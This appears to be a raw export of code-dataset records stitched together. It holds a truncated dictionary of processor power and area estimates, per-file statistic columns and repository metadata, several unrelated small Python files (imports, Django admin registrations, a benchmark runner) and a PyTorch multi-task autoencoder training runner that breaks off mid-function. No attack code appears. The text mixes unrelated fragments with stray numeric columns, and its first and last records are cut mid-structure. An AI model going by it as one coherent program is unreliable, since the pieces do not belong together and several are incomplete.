'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Gate Leakage': 0.000154548,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Peak Dynamic': 0.0142575,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Runtime Dynamic': 0.000764647,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage': 0.00384344,
'Instruction Fetch Unit/Branch Predictor/L1_Local Predictor/Subthreshold Leakage with power gating': 0.00198631,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Area': 0.0151917,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Gate Leakage': 8.00196e-05,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Peak Dynamic': 0.00527447,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Runtime Dynamic': 0.00029955,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage': 0.00181347,
'Instruction Fetch Unit/Branch Predictor/L2_Local Predictor/Subthreshold Leakage with power gating': 0.000957045,
'Instruction Fetch Unit/Branch Predictor/Peak Dynamic': 0.0597838,
'Instruction Fetch Unit/Branch Predictor/RAS/Area': 0.0105732,
'Instruction Fetch Unit/Branch Predictor/RAS/Gate Leakage': 4.63858e-05,
'Instruction Fetch Unit/Branch Predictor/RAS/Peak Dynamic': 0.0117602,
'Instruction Fetch Unit/Branch Predictor/RAS/Runtime Dynamic': 0.00133631,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage': 0.000932505,
'Instruction Fetch Unit/Branch Predictor/RAS/Subthreshold Leakage with power gating': 0.000494733,
'Instruction Fetch Unit/Branch Predictor/Runtime Dynamic': 0.00384187,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage': 0.0199703,
'Instruction Fetch Unit/Branch Predictor/Subthreshold Leakage with power gating': 0.0103282,
'Instruction Fetch Unit/Branch Target Buffer/Area': 0.64954,
'Instruction Fetch Unit/Branch Target Buffer/Gate Leakage': 0.00272758,
'Instruction Fetch Unit/Branch Target Buffer/Peak Dynamic': 0.177867,
'Instruction Fetch Unit/Branch Target Buffer/Runtime Dynamic': 0.00811442,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage': 0.0811682,
'Instruction Fetch Unit/Branch Target Buffer/Subthreshold Leakage with power gating': 0.0435357,
'Instruction Fetch Unit/Gate Leakage': 0.0589979,
'Instruction Fetch Unit/Instruction Buffer/Area': 0.0226323,
'Instruction Fetch Unit/Instruction Buffer/Gate Leakage': 6.83558e-05,
'Instruction Fetch Unit/Instruction Buffer/Peak Dynamic': 0.606827,
'Instruction Fetch Unit/Instruction Buffer/Runtime Dynamic': 0.0894269,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage': 0.00151885,
'Instruction Fetch Unit/Instruction Buffer/Subthreshold Leakage with power gating': 0.000701682,
'Instruction Fetch Unit/Instruction Cache/Area': 3.14635,
'Instruction Fetch Unit/Instruction Cache/Gate Leakage': 0.029931,
'Instruction Fetch Unit/Instruction Cache/Peak Dynamic': 5.68832,
'Instruction Fetch Unit/Instruction Cache/Runtime Dynamic': 0.231807,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage': 0.367022,
'Instruction Fetch Unit/Instruction Cache/Subthreshold Leakage with power gating': 0.180386,
'Instruction Fetch Unit/Instruction Decoder/Area': 1.85799,
'Instruction Fetch Unit/Instruction Decoder/Gate Leakage': 0.0222493,
'Instruction Fetch Unit/Instruction Decoder/Peak Dynamic': 1.37404,
'Instruction Fetch Unit/Instruction Decoder/Runtime Dynamic': 0.303734,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage': 0.442943,
'Instruction Fetch Unit/Instruction Decoder/Subthreshold Leakage with power gating': 0.166104,
'Instruction Fetch Unit/Peak Dynamic': 8.1829,
'Instruction Fetch Unit/Runtime Dynamic': 0.636924,
'Instruction Fetch Unit/Subthreshold Leakage': 0.932286,
'Instruction Fetch Unit/Subthreshold Leakage with power gating': 0.40843,
'L2/Area': 4.53318,
'L2/Gate Leakage': 0.015464,
'L2/Peak Dynamic': 0.0525827,
'L2/Runtime Dynamic': 0.0034163,
'L2/Subthreshold Leakage': 0.834142,
'L2/Subthreshold Leakage with power gating': 0.401066,
'Load Store Unit/Area': 8.80901,
'Load Store Unit/Data Cache/Area': 6.84535,
'Load Store Unit/Data Cache/Gate Leakage': 0.0279261,
'Load Store Unit/Data Cache/Peak Dynamic': 2.96824,
'Load Store Unit/Data Cache/Runtime Dynamic': 0.833238,
'Load Store Unit/Data Cache/Subthreshold Leakage': 0.527675,
'Load Store Unit/Data Cache/Subthreshold Leakage with power gating': 0.25085,
'Load Store Unit/Gate Leakage': 0.0350888,
'Load Store Unit/LoadQ/Area': 0.0836782,
'Load Store Unit/LoadQ/Gate Leakage': 0.00059896,
'Load Store Unit/LoadQ/Peak Dynamic': 0.0560059,
'Load Store Unit/LoadQ/Runtime Dynamic': 0.0560059,
'Load Store Unit/LoadQ/Subthreshold Leakage': 0.00941961,
'Load Store Unit/LoadQ/Subthreshold Leakage with power gating': 0.00536918,
'Load Store Unit/Peak Dynamic': 3.23271,
'Load Store Unit/Runtime Dynamic': 1.16545,
'Load Store Unit/StoreQ/Area': 0.322079,
'Load Store Unit/StoreQ/Gate Leakage': 0.00329971,
'Load Store Unit/StoreQ/Peak Dynamic': 0.138101,
'Load Store Unit/StoreQ/Runtime Dynamic': 0.276202,
'Load Store Unit/StoreQ/Subthreshold Leakage': 0.0345621,
'Load Store Unit/StoreQ/Subthreshold Leakage with power gating': 0.0197004,
'Load Store Unit/Subthreshold Leakage': 0.591321,
'Load Store Unit/Subthreshold Leakage with power gating': 0.283293,
'Memory Management Unit/Area': 0.4339,
'Memory Management Unit/Dtlb/Area': 0.0879726,
'Memory Management Unit/Dtlb/Gate Leakage': 0.00088729,
'Memory Management Unit/Dtlb/Peak Dynamic': 0.0490125,
'Memory Management Unit/Dtlb/Runtime Dynamic': 0.0497942,
'Memory Management Unit/Dtlb/Subthreshold Leakage': 0.0155699,
'Memory Management Unit/Dtlb/Subthreshold Leakage with power gating': 0.00887485,
'Memory Management Unit/Gate Leakage': 0.00808595,
'Memory Management Unit/Itlb/Area': 0.301552,
'Memory Management Unit/Itlb/Gate Leakage': 0.00393464,
'Memory Management Unit/Itlb/Peak Dynamic': 0.353679,
'Memory Management Unit/Itlb/Runtime Dynamic': 0.0380247,
'Memory Management Unit/Itlb/Subthreshold Leakage': 0.0413758,
'Memory Management Unit/Itlb/Subthreshold Leakage with power gating': 0.0235842,
'Memory Management Unit/Peak Dynamic': 0.593983,
'Memory Management Unit/Runtime Dynamic': 0.0878189,
'Memory Management Unit/Subthreshold Leakage': 0.0766103,
'Memory Management Unit/Subthreshold Leakage with power gating': 0.0398333,
'Peak Dynamic': 21.6369,
'Renaming Unit/Area': 0.303608,
'Renaming Unit/FP Front End RAT/Area': 0.131045,
'Renaming Unit/FP Front End RAT/Gate Leakage': 0.00351123,
'Renaming Unit/FP Front End RAT/Peak Dynamic': 2.51468,
'Renaming Unit/FP Front End RAT/Runtime Dynamic': 0.50403,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage': 0.0308571,
'Renaming Unit/FP Front End RAT/Subthreshold Leakage with power gating': 0.0175885,
'Renaming Unit/Free List/Area': 0.0340654,
'Renaming Unit/Free List/Gate Leakage': 2.5481e-05,
'Renaming Unit/Free List/Peak Dynamic': 0.0306032,
'Renaming Unit/Free List/Runtime Dynamic': 0.0196637,
'Renaming Unit/Free List/Subthreshold Leakage': 0.000370144,
'Renaming Unit/Free List/Subthreshold Leakage with power gating': 0.000201064,
'Renaming Unit/Gate Leakage': 0.00708398,
'Renaming Unit/Int Front End RAT/Area': 0.0941223,
'Renaming Unit/Int Front End RAT/Gate Leakage': 0.000283242,
'Renaming Unit/Int Front End RAT/Peak Dynamic': 0.731965,
'Renaming Unit/Int Front End RAT/Runtime Dynamic': 0.141035,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage': 0.00435488,
'Renaming Unit/Int Front End RAT/Subthreshold Leakage with power gating': 0.00248228,
'Renaming Unit/Peak Dynamic': 3.58947,
'Renaming Unit/Runtime Dynamic': 0.66473,
'Renaming Unit/Subthreshold Leakage': 0.0552466,
'Renaming Unit/Subthreshold Leakage with power gating': 0.0276461,
'Runtime Dynamic': 5.23805,
'Subthreshold Leakage': 6.16288,
'Subthreshold Leakage with power gating': 2.55328}],
'DRAM': {'Area': 0,
'Gate Leakage': 0,
'Peak Dynamic': 0.6975723338144482,
'Runtime Dynamic': 0.6975723338144482,
'Subthreshold Leakage': 4.252,
'Subthreshold Leakage with power gating': 4.252},
'L3': [{'Area': 61.9075,
'Gate Leakage': 0.0484137,
'Peak Dynamic': 0.228277,
'Runtime Dynamic': 0.133249,
'Subthreshold Leakage': 6.80085,
'Subthreshold Leakage with power gating': 3.32364}],
'Processor': {'Area': 191.908,
'Gate Leakage': 1.53485,
'Peak Dynamic': 88.4561,
'Peak Power': 121.568,
'Runtime Dynamic': 22.9253,
'Subthreshold Leakage': 31.5774,
'Subthreshold Leakage with power gating': 13.9484,
'Total Cores/Area': 128.669,
'Total Cores/Gate Leakage': 1.4798,
'Total Cores/Peak Dynamic': 88.2278,
'Total Cores/Runtime Dynamic': 22.7921,
'Total Cores/Subthreshold Leakage': 24.7074,
'Total Cores/Subthreshold Leakage with power gating': 10.2429,
'Total L3s/Area': 61.9075,
'Total L3s/Gate Leakage': 0.0484137,
'Total L3s/Peak Dynamic': 0.228277,
'Total L3s/Runtime Dynamic': 0.133249,
'Total L3s/Subthreshold Leakage': 6.80085,
'Total L3s/Subthreshold Leakage with power gating': 3.32364,
'Total Leakage': 33.1122,
'Total NoCs/Area': 1.33155,
'Total NoCs/Gate Leakage': 0.00662954,
'Total NoCs/Peak Dynamic': 0.0,
'Total NoCs/Runtime Dynamic': 0.0,
'Total NoCs/Subthreshold Leakage': 0.0691322,
'Total NoCs/Subthreshold Leakage with power gating': 0.0259246}}
| 75.043764
| 124
| 0.681994
| 8,082
| 68,590
| 5.781985
| 0.067681
| 0.123604
| 0.11299
| 0.093473
| 0.939589
| 0.930987
| 0.919345
| 0.886518
| 0.863278
| 0.842671
| 0
| 0.131638
| 0.224391
| 68,590
| 914
| 125
| 75.043764
| 0.746762
| 0
| 0
| 0.642232
| 0
| 0
| 0.657594
| 0.048111
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
4fa66191e897b600fad36daad8d96f0c2b5f8443
| 93
|
py
|
Python
|
project/Packaging/sta663/pkg/sub1/__init__.py
|
taotangtt/sta-663-2018
|
67dac909477f81d83ebe61e0753de2328af1be9c
|
[
"BSD-3-Clause"
] | 72
|
2018-01-20T20:50:22.000Z
|
2022-02-27T23:24:21.000Z
|
project/Packaging/sta663/pkg/sub1/__init__.py
|
taotangtt/sta-663-2018
|
67dac909477f81d83ebe61e0753de2328af1be9c
|
[
"BSD-3-Clause"
] | 1
|
2020-02-03T13:43:46.000Z
|
2020-02-03T13:43:46.000Z
|
project/Packaging/sta663/pkg/sub1/__init__.py
|
taotangtt/sta-663-2018
|
67dac909477f81d83ebe61e0753de2328af1be9c
|
[
"BSD-3-Clause"
] | 64
|
2018-01-12T17:13:14.000Z
|
2022-03-14T20:22:46.000Z
|
from sta663.pkg.sub1.sub1_stuff import g1, g2
from sta663.pkg.sub1.more_sub1_stuff import g3
| 31
| 46
| 0.827957
| 18
| 93
| 4.111111
| 0.555556
| 0.27027
| 0.351351
| 0.459459
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.154762
| 0.096774
| 93
| 2
| 47
| 46.5
| 0.72619
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 8
|
8c035e20af93b4a9437d1bf06d22384db29111c2
| 138
|
py
|
Python
|
src/ribo_api/services/__init__.py
|
RinPham/RiBo-Core
|
8c5a00a215b42aad2f6a4167b9cb97fe11d78823
|
[
"MIT"
] | null | null | null |
src/ribo_api/services/__init__.py
|
RinPham/RiBo-Core
|
8c5a00a215b42aad2f6a4167b9cb97fe11d78823
|
[
"MIT"
] | null | null | null |
src/ribo_api/services/__init__.py
|
RinPham/RiBo-Core
|
8c5a00a215b42aad2f6a4167b9cb97fe11d78823
|
[
"MIT"
] | null | null | null |
from ribo_api.services.base import BaseService
from ribo_api.services.user import UserService
from ribo_api.services.api import ApiService
| 46
| 46
| 0.876812
| 21
| 138
| 5.619048
| 0.47619
| 0.20339
| 0.279661
| 0.483051
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.07971
| 138
| 3
| 47
| 46
| 0.929134
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
8c5cb0f996576be9afa7a1ffbca68a5ff7178000
| 214
|
py
|
Python
|
lfs_samples/admin.py
|
diefenbach/lfs-samples
|
2ebd25a1e30a3513cbf0cb2b84066ed1f35011a2
|
[
"BSD-3-Clause"
] | 1
|
2021-02-22T09:57:48.000Z
|
2021-02-22T09:57:48.000Z
|
lfs_samples/admin.py
|
diefenbach/lfs-samples
|
2ebd25a1e30a3513cbf0cb2b84066ed1f35011a2
|
[
"BSD-3-Clause"
] | null | null | null |
lfs_samples/admin.py
|
diefenbach/lfs-samples
|
2ebd25a1e30a3513cbf0cb2b84066ed1f35011a2
|
[
"BSD-3-Clause"
] | null | null | null |
# django imports
from django.contrib import admin
# lfs imports
from . models import IsSample
from . models import ProductSamplesRelation
admin.site.register(ProductSamplesRelation)
admin.site.register(IsSample)
| 21.4
| 43
| 0.827103
| 25
| 214
| 7.08
| 0.48
| 0.124294
| 0.180791
| 0.440678
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.11215
| 214
| 9
| 44
| 23.777778
| 0.931579
| 0.121495
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.6
| 0
| 0.6
| 0
| 1
| 0
| 0
| null | 0
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
4fc87eccd2b298f62b5e11f1699e4a410091c837
| 136
|
py
|
Python
|
trojsten/polls/admin.py
|
MvonK/web
|
b701a6ea8fb6f0bdfb720e66d0a430db13db8bff
|
[
"MIT"
] | 5
|
2018-04-22T22:44:02.000Z
|
2021-04-26T20:44:44.000Z
|
trojsten/polls/admin.py
|
MvonK/web
|
b701a6ea8fb6f0bdfb720e66d0a430db13db8bff
|
[
"MIT"
] | 250
|
2018-04-24T12:04:11.000Z
|
2022-03-09T06:56:47.000Z
|
trojsten/polls/admin.py
|
MvonK/web
|
b701a6ea8fb6f0bdfb720e66d0a430db13db8bff
|
[
"MIT"
] | 8
|
2019-04-28T11:33:03.000Z
|
2022-02-26T13:30:36.000Z
|
from django.contrib import admin
from .models import Answer, Question
admin.site.register(Question)
admin.site.register(Answer)
| 19.428571
| 37
| 0.779412
| 18
| 136
| 5.888889
| 0.555556
| 0.245283
| 0.320755
| 0.471698
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.139706
| 136
| 6
| 38
| 22.666667
| 0.905983
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 0.5
| 0
| 0.5
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
4ff9300b1d23f8969ba774191d1a4d73a27c9fc9
| 34
|
py
|
Python
|
src/lib/os.py
|
DTenore/skulpt
|
098d20acfb088d6db85535132c324b7ac2f2d212
|
[
"MIT"
] | 2,671
|
2015-01-03T08:23:25.000Z
|
2022-03-31T06:15:48.000Z
|
src/lib/os.py
|
wakeupmuyunhe/skulpt
|
a8fb11a80fb6d7c016bab5dfe3712517a350b347
|
[
"MIT"
] | 972
|
2015-01-05T08:11:00.000Z
|
2022-03-29T13:47:15.000Z
|
src/lib/os.py
|
wakeupmuyunhe/skulpt
|
a8fb11a80fb6d7c016bab5dfe3712517a350b347
|
[
"MIT"
] | 845
|
2015-01-03T19:53:36.000Z
|
2022-03-29T18:34:22.000Z
|
import _sk_fail; _sk_fail._("os")
| 17
| 33
| 0.735294
| 6
| 34
| 3.333333
| 0.666667
| 0.6
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.088235
| 34
| 1
| 34
| 34
| 0.645161
| 0
| 0
| 0
| 0
| 0
| 0.058824
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 1
| 0
| null | 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
8b27a2afc6ccae134858a3d18bf5c00c8437e79f
| 3,347
|
py
|
Python
|
src/run_ensembles_from_saved_parameter_tuning_mlp.py
|
martasls/pythonic-learning-machine
|
330d1d5320adc8667bc7ce527808ec7a9c2271d4
|
[
"MIT"
] | null | null | null |
src/run_ensembles_from_saved_parameter_tuning_mlp.py
|
martasls/pythonic-learning-machine
|
330d1d5320adc8667bc7ce527808ec7a9c2271d4
|
[
"MIT"
] | null | null | null |
src/run_ensembles_from_saved_parameter_tuning_mlp.py
|
martasls/pythonic-learning-machine
|
330d1d5320adc8667bc7ce527808ec7a9c2271d4
|
[
"MIT"
] | null | null | null |
from benchmark.benchmarker import pickup_benchmark
def run_ensembles(dataset_name, benchmark_file_name):
pickup_benchmark(dataset_name, benchmark_file_name)
if __name__ == '__main__':
# run_ensembles('r_concrete', 'r_concrete_slm__2019_02_05__06_13_44.pkl')
run_ensembles('r_concrete', 'r_concrete_mlp-sgd-adam__2019_02_05__21_14_31.pkl')
# run_ensembles('r_concrete', 'r_concrete_mlp__2019_02_05__19_26_39.pkl')
# run_ensembles('c_cancer', 'c_cancer_slm__2019_02_05__06_13_44.pkl')
run_ensembles('c_cancer', 'c_cancer_mlp-sgd-adam__2019_02_05__22_12_15.pkl')
# run_ensembles('c_cancer', 'c_cancer_mlp__2019_02_05__19_12_26.pkl')
# run_ensembles('c_sonar', 'c_sonar_slm__2019_02_05__06_13_44.pkl')
run_ensembles('c_sonar', 'c_sonar_mlp-sgd-adam__2019_02_05__22_12_15.pkl')
# run_ensembles('c_sonar', 'c_sonar_mlp__2019_02_05__19_12_26.pkl')
# run_ensembles('r_parkinsons', 'r_parkinsons_slm__2019_02_05__06_13_44.pkl')
run_ensembles('r_parkinsons', 'r_parkinsons_mlp-sgd-adam__2019_02_05__21_14_31.pkl')
# run_ensembles('r_parkinsons', 'r_parkinsons_mlp__2019_02_05__18_43_45.pkl')
# run_ensembles('r_music', 'r_music_slm__2019_02_05__06_13_44.pkl')
run_ensembles('r_music', 'r_music_mlp-sgd-adam__2019_02_05__21_14_31.pkl')
# run_ensembles('r_music', 'r_music_mlp__2019_02_05__18_43_45.pkl')
# run_ensembles('c_credit', 'c_credit_slm__2019_02_05__06_13_44.pkl')
run_ensembles('c_credit', 'c_credit_mlp-sgd-adam__2019_02_05__22_12_15.pkl')
# run_ensembles('c_credit', 'c_credit_mlp__2019_02_05__18_10_54.pkl')
# run_ensembles('c_diabetes', 'c_diabetes_slm__2019_02_05__06_13_44.pkl')
run_ensembles('c_diabetes', 'c_diabetes_mlp-sgd-adam__2019_02_05__22_12_15.pkl')
# run_ensembles('c_diabetes', 'c_diabetes_mlp__2019_02_05__18_10_54.pkl')
# run_ensembles('r_bio', 'r_bio_slm__2019_02_05__06_13_44.pkl')
run_ensembles('r_bio', 'r_bio_mlp-sgd-adam__2019_02_05__21_14_31.pkl')
# run_ensembles('r_bio', 'r_bio_mlp__2019_02_05__06_13_51.pkl')
# run_ensembles('r_ppb', 'r_ppb_slm__2019_02_05__06_13_44.pkl')
run_ensembles('r_ppb', 'r_ppb_mlp-sgd-adam__2019_02_05__21_14_31.pkl')
# run_ensembles('r_ppb', 'r_ppb_mlp__2019_02_05__06_13_51.pkl')
# run_ensembles('r_student', 'r_student_slm__2019_02_05__06_13_44.pkl')
run_ensembles('r_student', 'r_student_mlp-sgd-adam__2019_02_05__21_14_31.pkl')
# run_ensembles('r_student', 'r_student_mlp__2019_02_05__06_13_51.pkl')]
""" not updated: SLM """
# run_ensembles("c_credit", "c_credit_slm__2019_01_27__23_03_36.pkl")
# run_ensembles("c_diabetes", "c_diabetes_slm__2019_01_27__23_03_36.pkl")
# run_ensembles("r_bio", "r_bio_slm__2019_01_27__23_03_36.pkl")
# run_ensembles("r_ppb", "r_ppb_slm__2019_01_27__23_03_36.pkl")
# run_ensembles("r_student", "r_student_slm__2019_01_27__23_03_36.pkl")
""" not updated: MLP """
# run_ensembles("c_credit", "c_credit_mlp__2019_01_29__13_57_03.pkl")
# run_ensembles("c_diabetes", "c_diabetes_mlp__2019_01_29__13_57_03.pkl")
# run_ensembles("r_bio", "r_bio_mlp__2019_01_27__23_03_38.pkl")
# run_ensembles("r_ppb", "r_ppb_mlp__2019_01_27__23_03_38.pkl")
# run_ensembles("r_student", "r_student_mlp__2019_01_27__23_03_38.pkl")
| 53.126984
| 88
| 0.767254
| 610
| 3,347
| 3.395082
| 0.1
| 0.237566
| 0.267986
| 0.177692
| 0.944471
| 0.912603
| 0.898117
| 0.861902
| 0.704491
| 0.60309
| 0
| 0.188806
| 0.113833
| 3,347
| 62
| 89
| 53.983871
| 0.50944
| 0.610696
| 0
| 0
| 0
| 0
| 0.457516
| 0.384804
| 0
| 0
| 0
| 0
| 0
| 1
| 0.071429
| false
| 0
| 0.071429
| 0
| 0.142857
| 0
| 0
| 0
| 0
| null | 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 9
|
8cc988ac6952de00ee50cdb5bd026e28b6ca813b
| 188,066
|
py
|
Python
|
Multi-task AE/runner/MVAE_runner.py
|
ZiyHe/SLF_Estimate
|
9ff2ed6d7de2ca63455e31db0adf0b8daf68606a
|
[
"MIT"
] | null | null | null |
Multi-task AE/runner/MVAE_runner.py
|
ZiyHe/SLF_Estimate
|
9ff2ed6d7de2ca63455e31db0adf0b8daf68606a
|
[
"MIT"
] | null | null | null |
Multi-task AE/runner/MVAE_runner.py
|
ZiyHe/SLF_Estimate
|
9ff2ed6d7de2ca63455e31db0adf0b8daf68606a
|
[
"MIT"
] | null | null | null |
import numpy as np
import os
import torch
import torch.optim as optim
from torch.nn import functional as F
from torch.utils.data import DataLoader, TensorDataset, random_split
from torchvision.utils import save_image
from model.Multitask_AE import MAE, MGVAE, MLVAE, MGMVAE, MLMVAE
import sys
sys.path.append('..')
import random
import scipy.io as sio
from torchinfo import summary
from sklearn.metrics import roc_curve
import cv2
# runner for Multi-task AE
class MAE_runner():
def __init__(self, args):
self.args = args
cuda_flag = not self.args.no_cuda and torch.cuda.is_available()
self.device = torch.device("cuda" if cuda_flag else "cpu")
torch.manual_seed(self.args.seed)
random.seed(self.args.seed)
self.path = self.args.run + 'MAE/'
if not os.path.exists(self.path):
os.makedirs(self.path)
def get_optimizer(self, parameters):
if self.args.optimizer == 'Adam':
return optim.Adam(parameters, lr=self.args.lr, weight_decay=self.args.weight_decay, betas=(0.9, 0.999), eps=1e-7)
elif self.args.optimizer == 'RMSProp':
return optim.RMSprop(parameters, lr=self.args.lr, weight_decay=self.args.weight_decay)
elif self.args.optimizer == 'SGD':
return optim.SGD(parameters, lr=self.args.lr, momentum=0.9)
else:
raise NotImplementedError('Optimizer {} not understood.'.format(self.args.optimizer))
def load_data(self, noise_level='all'):
dataset, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min = self.load_training_data()
train_size = int(len(dataset)*0.9)
val_size = int(len(dataset)*0.1)
dataset_train, dataset_val = random_split(dataset, [train_size, val_size],
generator=torch.Generator().manual_seed(self.args.seed))
dataset_test = self.load_testing_data(RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level)
dataset_test1 = self.load_testing_img1(RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level)
dataset_test2 = self.load_testing_img2(RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level)
train_loader = DataLoader(
dataset_train,
batch_size=self.args.batch_size, shuffle=True, num_workers=2)
val_loader = DataLoader(
dataset_val,
batch_size=self.args.batch_size, shuffle=True, num_workers=2)
test_loader = DataLoader(
dataset_test,
batch_size=self.args.batch_size, shuffle=False, num_workers=2)
test_loader1 = DataLoader(
dataset_test1,
batch_size=self.args.batch_size, shuffle=False, num_workers=2)
test_loader2 = DataLoader(
dataset_test2,
batch_size=self.args.batch_size, shuffle=False, num_workers=2)
print("Data Loaded!")
return train_loader, val_loader, test_loader, test_loader1, test_loader2
def load_training_data(self):
# Load training data
training_data = sio.loadmat('./data/training_data.mat')
# normalized noisy RSS measurement input (shape: [num_sample, NxPxP])
train_input_RSS = training_data['RSS']
RSS_max = np.amax(train_input_RSS, axis=0, keepdims=True)
RSS_min = np.amin(train_input_RSS, axis=0, keepdims=True)
train_input_RSS = (train_input_RSS - RSS_min) / (RSS_max - RSS_min)
train_input_RSS = train_input_RSS.reshape(-1, self.args.N, self.args.P, self.args.P)
# normalized clean RSS measurement input (as target for decoder) (shape: [num_sample, NxPxP])
train_denoise_RSS = training_data['RSS_denoise']
RSS_denoise_max = np.amax(train_denoise_RSS, axis=0, keepdims=True)
RSS_denoise_min = np.amin(train_denoise_RSS, axis=0, keepdims=True)
train_denoise_RSS = (train_denoise_RSS - RSS_denoise_min) / (RSS_denoise_max - RSS_denoise_min)
train_denoise_RSS = train_denoise_RSS.reshape(-1, self.args.N, self.args.P, self.args.P)
# SLF image (shape: [num_sample, K[0]*K[1]])
train_slf_img = training_data['slf_img']
train_slf_img = train_slf_img.reshape(-1, self.args.K0*self.args.K1)
# b: bias. alpha: path loss exponent. ab_norm: [b_norm, alpha_norm] (shape: [num_sample, N+1])
train_ab = training_data['ab_norm']
# noise level classes (shape: [num_sample, 1]) (classes: 0, 1, 2)
train_noise_level = training_data['sig_epsilon_class']
train_noise_level = np.squeeze(train_noise_level)
train_input_RSS = torch.from_numpy(train_input_RSS).float()
train_denoise_RSS = torch.from_numpy(train_denoise_RSS).float()
train_slf_img = torch.from_numpy(train_slf_img).float()
train_ab = torch.from_numpy(train_ab).float()
train_noise_level = torch.from_numpy(train_noise_level).long()
Train_Dataset = TensorDataset(train_input_RSS, train_denoise_RSS, train_slf_img, train_ab, train_noise_level)
return Train_Dataset, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min
def load_testing_data(self, RSS_max, RSS_min, RSS_denoise_max, RSS_denoise_min, noise_level='all'):
# Load testing data
testing_data = sio.loadmat('./data/testing_data.mat')
# noise level classes (shape: [num_sample, 1]) (classes: 0, 1, 2)
test_noise_class = testing_data['sig_epsilon_class']
test_noise_class = np.squeeze(test_noise_class)
idx = (test_noise_class == 0) | (test_noise_class == 1) | (test_noise_class == 2)
if noise_level == 'all':
pass
elif noise_level == 'low':
idx = (test_noise_class == 0)
elif noise_level == 'mid':
idx = (test_noise_class == 1)
elif noise_level == 'high':
idx = (test_noise_class == 2)
else:
raise NotImplementedError('Noise level {} not understood.'.format(noise_level))
test_noise_class = test_noise_class[idx]
# normalized noisy RSS measurement input (shape: [num_sample, NxPxP])
test_input_RSS = testing_data['RSS'][idx]
test_input_RSS = (test_input_RSS - RSS_min) / (RSS_max - RSS_min)
test_input_RSS = test_input_RSS.reshape(-1, self.args.N, self.args.P, self.args.P)
# normalized clean RSS measurement input (as target for decoder) (shape: [num_sample, NxPxP])
test_denoise_RSS = testing_data['RSS_denoise'][idx]
